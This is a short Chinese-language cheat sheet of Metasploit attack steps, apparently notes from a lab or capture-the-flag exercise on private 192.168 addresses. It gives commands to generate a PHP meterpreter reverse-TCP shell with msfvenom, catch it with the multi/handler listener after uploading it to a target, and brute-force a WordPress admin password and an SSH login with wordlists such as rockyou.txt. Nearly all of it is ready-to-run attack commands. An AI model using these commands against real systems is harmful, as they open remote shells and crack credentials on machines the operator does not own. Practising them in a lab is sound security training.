1,制作一个反弹shell,来执行服务的命令,并监听
(能在浏览器上直接访问的就制作php的,可以使用命令执行的建议使用 python型的)
(制作python型的只需要把php改为python就可以了)
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.11.166 lport=4444 -f raw
-p 指定使用模块 -f raw 显示源代码
使用msfconsole监听
msfconsole
use exploit/multi/handler //使用 这个攻击模块
set payload php/meterpreter/reverse_tcp //设置payload
show options
set lhost 192.168.11.165
run
然后上传并执行 反弹shell代码
在监听端就会显示相应内容
2,暴力破解wordpress的password
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
show options
set username admin
set pass_file /usr/share/wordlists/dirb/comment.txt
set targeturl /secret/
set rhost 192.168.11.170
run
其中如果不知道 username 可以用 wpscan 先进行暴力破解 username
3,暴力破解ssh的登录密码
msfconsole
use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 192.168.1.106
set username hadi
set pass_file /usr/share/wordlists/rockyou.txt //设置字典
set thread 10
show options
run